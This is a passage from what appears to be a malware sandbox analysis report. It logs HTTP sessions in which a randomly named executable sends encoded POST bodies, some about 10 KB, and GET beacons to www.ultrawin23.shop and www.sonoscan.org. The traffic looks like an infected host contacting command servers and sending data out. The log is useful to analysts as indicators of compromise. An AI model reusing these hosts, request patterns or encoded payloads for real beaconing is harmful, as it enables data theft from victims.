                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.449978170.39.213.43804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:44.881557941 CET623OUTPOST /53y2/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Origin: http://www.ultrawin23.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.ultrawin23.shop/53y2/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 76 33 6b 57 2b 61 2b 6e 73 63 6d 64 47 41 6b 4d 53 57 7a 6b 34 53 67 48 63 70 52 73 39 4b 54 30 56 68 6d 34 49 48 70 75 47 39 67 78 52 59 44 43 53 45 42 37 71 77 46 33 43 36 31 36 65 6e 55 4b 45 67 74 61 53 43 59 31 62 6d 42 56 4e 32 73 2f 79 4f 55 7a 30 38 48 39 58 30 6e 33 37 49 66 55 39 2b 51 50 44 53 43 71 74 4f 2f 64 42 6b 43 30 43 2b 58 54 66 35 4c 78 6c 38 39 56 68 52 4e 6c 58 4a 6b 39 61 4c 74 30 35 41 2b 35 53 70 79 45 55 79 61 72 6d 51 45 35 42 69 2f 72 2b 2f 6d 4e 43 4a 64 72 78 45 6a 57 70 47 4b 37 59 3d
                                                                                                                                  Data Ascii: NBfdCRyH=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGv3kW+a+nscmdGAkMSWzk4SgHcpRs9KT0Vhm4IHpuG9gxRYDCSEB7qwF3C616enUKEgtaSCY1bmBVN2s/yOUz08H9X0n37IfU9+QPDSCqtO/dBkC0C+XTf5Lxl89VhRNlXJk9aLt05A+5SpyEUyarmQE5Bi/r+/mNCJdrxEjWpGK7Y=
                                                                                                                                  Nov 7, 2024 12:53:45.465450048 CET907INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:45 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.449994170.39.213.43804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:47.428281069 CET10705OUTPOST /53y2/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Origin: http://www.ultrawin23.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.ultrawin23.shop/53y2/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 58 33 6b 6b 47 61 73 56 45 63 6c 64 47 41 36 63 53 62 7a 6b 35 51 67 44 34 31 52 73 42 38 54 32 64 68 70 2b 45 48 72 63 75 39 76 78 52 59 4d 69 53 46 4f 62 71 70 46 30 36 32 31 36 75 6e 55 4b 45 67 74 59 4b 43 50 78 48 6d 47 6c 4e 78 74 2f 79 43 51 7a 30 41 48 39 66 4b 6e 33 2f 79 65 6e 6c 2b 51 76 54 53 44 63 52 4f 69 74 42 63 4c 6b 43 6d 58 54 43 6a 4c 31 39 34 39 52 6f 45 4e 69 6e 4a 6e 70 54 66 77 67 35 44 6d 66 2b 42 75 6b 45 6e 66 34 4f 4d 49 70 35 6f 75 62 71 43 35 4d 75 71 53 71 68 41 2b 6b 70 65 63 73 77 4b 69 72 70 64 78 34 52 52 4f 48 75 55 77 6b 41 6a 72 51 74 6d 73 4a 47 47 62 2b 32 72 69 42 35 4a 44 50 4a 58 4f 61 6d 49 59 36 7a 52 66 65 71 6e 4c 71 35 79 2f 6d 54 76 54 65 79 35 4d 56 62 78 57 69 52 4f 59 70 48 43 74 61 36 57 54 4f 52 6a 41 6f 6d 6c 43 43 45 71 6c 38 64 4e 6b 37 37 31 41 79 74 71 50 78 79 4f 6e 5a 6f 4b 78 33 75 39 73 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGX3kkGasVEcldGA6cSbzk5QgD41RsB8T2dhp+EHrcu9vxRYMiSFObqpF06216unUKEgtYKCPxHmGlNxt/yCQz0AH9fKn3/yenl+QvTSDcROitBcLkCmXTCjL1949RoENinJnpTfwg5Dmf+BukEnf4OMIp5oubqC5MuqSqhA+kpecswKirpdx4RROHuUwkAjrQtmsJGGb+2riB5JDPJXOamIY6zRfeqnLq5y/mTvTey5MVbxWiROYpHCta6WTORjAomlCCEql8dNk771AytqPxyOnZoKx3u9sLmssprn53yxFfM7LnaFKZ/QHuvovtIv8aT9JziYzSQadr1O5GrT205VWUJN9TlQVXx685Ro7oJgM/8KSQeutlenf6VRbH18ggrxG4GDemAmcj7XAGJ208RWxmUXU4poaVtrHnlhKxuswwOcX5gHtsZgmadi+fCurWKY1REZinW+7VII4vrcBLjiiP9nHA9LfSt6la+pRn9ioIW/vcfaaUqalBEKPpWlU/dMIblyqsU/rcYkPIIVP8bLugfusUrRy7Jqy7SWilkTRQJ1fuMvxGyR19QbGul7lFqLLVyvibTGMZAdKIHsKoDS6Ea95RNYv5icxCEkmyGyDPiAT8p0oLCIboMfxZu2KfiSwjvrQ7fYyLHfnUVfZmNyPk+6gt/EU7FUf8cbNKZ1hi0bwMbNeHmevaGiXMVmid1Gr3HxzSXsBlMTxTK4x0KM/Dc56lgI3OrLRcQJfTCTR/PDQYpozyUT2LB4WmEb0K02LjcoZXRA9EbX7Dr9CQQtBYFKC9dMBF0cQRaHTHdQqFank6cCNYRf4GdHxhMBkH+mP0Z0/bTLlC/9CsCWElOP91MX26pBEz6sS+SZ1x9Pg7M4qbXRsVIDUnd1DC3Dp1r1Vp4m33sUd0cnlk+EEbdC6B8X9MtXpM09Pv7+/K0O2unYdIMDgQBzeQBmhy0dUQn [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:48.013895988 CET907INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:47 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.450010170.39.213.43804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:49.977607012 CET337OUTGET /53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yqk5yDx2ID7OvEmOK8YK5XOUf59ObJyvEfgA=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:53:50.574702024 CET1057INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:50 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yqk5yDx2ID7OvEmOK8YK5XOUf59ObJyvEfgA=&ZpEH9=TjSP5LXXbN8d4
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.45002013.248.169.48804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:55.636496067 CET594OUTPOST /ew98/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Origin: http://www.sonoscan.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.sonoscan.org/ew98/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 61 43 6a 30 66 4a 4e 72 66 58 4f 71 79 46 7a 70 58 75 35 66 6c 30 34 79 38 36 78 56 51 72 6a 64 39 49 36 6b 5a 6c 55 6b 44 78 6d 6d 2f 37 36 56 73 70 41 78 63 48 54 4e 47 67 73 65 7a 63 4a 46 4b 50 6c 4a 61 4e 6f 58 37 78 69 67 58 74 59 6c 6b 77 66 75 78 45 65 6d 74 68 66 6b 44 42 65 73 79 67 47 65 37 45 46 36 78 2b 4c 32 35 4d 7a 32 45 47 39 35 35 6f 7a 5a 78 37 6d 2b 4e 6d 5a 64 51 57 58 6d 4d 51 32 76 63 32 79 56 68 2b 35 48 38 55 67 30 76 56 31 6c 43 44 61 2f 46 59 66 2b 53 45 7a 32 31 6e 48 31 6d 73 4d 4b 4e 74 58 64 53 65 37 69 53 41 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=OTBcpjr66R9YaCj0fJNrfXOqyFzpXu5fl04y86xVQrjd9I6kZlUkDxmm/76VspAxcHTNGgsezcJFKPlJaNoX7xigXtYlkwfuxEemthfkDBesygGe7EF6x+L25Mz2EG955ozZx7m+NmZdQWXmMQ2vc2yVh+5H8Ug0vV1lCDa/FYf+SEz21nH1msMKNtXdSe7iSA==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.45002113.248.169.48804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:58.181579113 CET614OUTPOST /ew98/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Origin: http://www.sonoscan.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.sonoscan.org/ew98/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 33 64 38 74 47 6b 59 6b 55 6b 41 78 6d 6d 33 62 36 55 78 5a 41 76 63 48 58 6a 47 69 49 65 7a 63 64 46 4b 4e 74 4a 62 2b 77 55 34 42 69 69 4d 39 59 6a 35 67 66 75 78 45 65 6d 74 6c 33 65 44 41 36 73 79 78 57 65 37 6c 46 35 34 65 4c 31 2b 4d 7a 32 56 57 39 39 35 6f 7a 72 78 2b 47 59 4e 6b 68 64 51 53 62 6d 4d 42 32 77 57 32 79 66 75 65 35 55 78 6b 35 51 67 6c 52 78 46 78 53 5a 43 35 62 79 54 43 2b 73 6b 57 6d 69 30 73 6f 35 51 71 65 70 66 64 47 72 4a 49 57 4c 56 45 63 39 42 52 2f 76 6c 57 34 51 2b 70 37 50 5a 63 41 3d
                                                                                                                                  Data Ascii: NBfdCRyH=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZ3d8tGkYkUkAxmm3b6UxZAvcHXjGiIezcdFKNtJb+wU4BiiM9Yj5gfuxEemtl3eDA6syxWe7lF54eL1+Mz2VW995ozrx+GYNkhdQSbmMB2wW2yfue5Uxk5QglRxFxSZC5byTC+skWmi0so5QqepfdGrJIWLVEc9BR/vlW4Q+p7PZcA=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.45002213.248.169.48804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:00.857305050 CET10696OUTPOST /ew98/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Origin: http://www.sonoscan.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.sonoscan.org/ew98/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 76 64 38 62 79 6b 5a 48 38 6b 42 78 6d 6d 72 4c 36 76 78 5a 42 71 63 47 7a 76 47 69 30 6b 7a 5a 5a 46 4c 6f 35 4a 50 62 63 55 6a 52 69 69 54 74 59 69 6b 77 66 42 78 45 4f 69 74 68 62 65 44 41 36 73 79 79 65 65 79 55 46 35 2b 65 4c 32 35 4d 7a 4d 45 47 39 52 35 6f 37 37 78 2b 43 75 4e 51 56 64 51 79 4c 6d 4f 7a 65 77 56 57 79 52 72 65 34 4a 78 6b 46 50 67 6c 4d 66 46 77 6d 6a 43 35 76 79 54 48 62 55 67 33 6d 62 6e 65 73 65 4d 35 36 69 66 39 36 65 50 70 65 56 63 58 55 59 61 43 4c 37 6f 47 38 5a 70 72 66 7a 41 5a 48 47 50 39 34 73 36 56 48 73 61 34 76 61 72 39 34 46 34 4f 4b 59 42 54 72 5a 6b 55 55 47 4a 63 32 79 55 51 78 45 50 6d 67 31 4a 4f 45 48 34 36 39 58 39 4c 49 2b 73 33 55 54 46 43 33 73 36 44 48 70 79 78 6f 46 64 4a 75 79 49 6d 79 33 52 77 57 52 30 68 70 4d 6f 4a 68 75 69 37 71 4b 71 65 2b 76 66 6b 67 56 65 33 76 53 2f 30 77 64 32 57 75 44 77 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZvd8bykZH8kBxmmrL6vxZBqcGzvGi0kzZZFLo5JPbcUjRiiTtYikwfBxEOithbeDA6syyeeyUF5+eL25MzMEG9R5o77x+CuNQVdQyLmOzewVWyRre4JxkFPglMfFwmjC5vyTHbUg3mbneseM56if96ePpeVcXUYaCL7oG8ZprfzAZHGP94s6VHsa4var94F4OKYBTrZkUUGJc2yUQxEPmg1JOEH469X9LI+s3UTFC3s6DHpyxoFdJuyImy3RwWR0hpMoJhui7qKqe+vfkgVe3vS/0wd2WuDw9e3N2CXADy4FtV5Ipxaot5FB/qgwJrv96kdYMAFZ8g6pSS0JWLJskg9WTQ1qaugMmbgcp11gW1v47qSg0pviL8l2XGW9cIi96uytI1AgYe0BZBZlpVwCuKcPct4vVyv5WxOtVNz8TXHjh56ZzrBx6GkJfgEkExQNDV7O6DTEOF7dg1nUaLZslSMFwP+mazRXdjproEY5tEj6NrTmSYP3siEtwBcqu/mJ6BYe8by9fpvaHp1hvDoASt2/2wsnEqyi08gAuVb/PZ0XcyLVUw+fwl/+Ktznl/eoVXjl5C3qkAvImlk+gl6nrp5SwpVZYXw1+zEwY55K5eal3Yg9ZVkRXKInSCpwN0+G2sawP01RoM0BhQxcfN9f7cit+DILMrmyxK1wjkXh0hRsh1Um2rVph2SEU06BAvF+Lv9ekR3Ohc+d2cF5tuWePoybjozkJHwnzsWU2uZ5NpNFv2/7Ka6+R4pDdrxbI6SJcxCiTX00sPhJsbrL8OffOnjWkW10uIdR1d2TuJXlOjtnTByput7nQtZ5JSgayQw6cv2SqvaqHC7oaGaP/3uJK2861NGlcjq0DkgypyslFI7/AOtR6Yb4fo7Fg7cMx0bwP7XBQvqbkvxggbf36LhHmjWcWYDij/zXF8qQRmBv45nu1k2VGcTjJI+Qgi5KjmE30M [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.45002313.248.169.48804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:03.430110931 CET334OUTGET /ew98/?NBfdCRyH=DRp8qVXu3DttXwS8YKhwd1fMqknFSvhogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpjUHvWcUntSXj4XGnqR7Id1KBxF+AplNn3Lg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:54:04.087508917 CET404INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
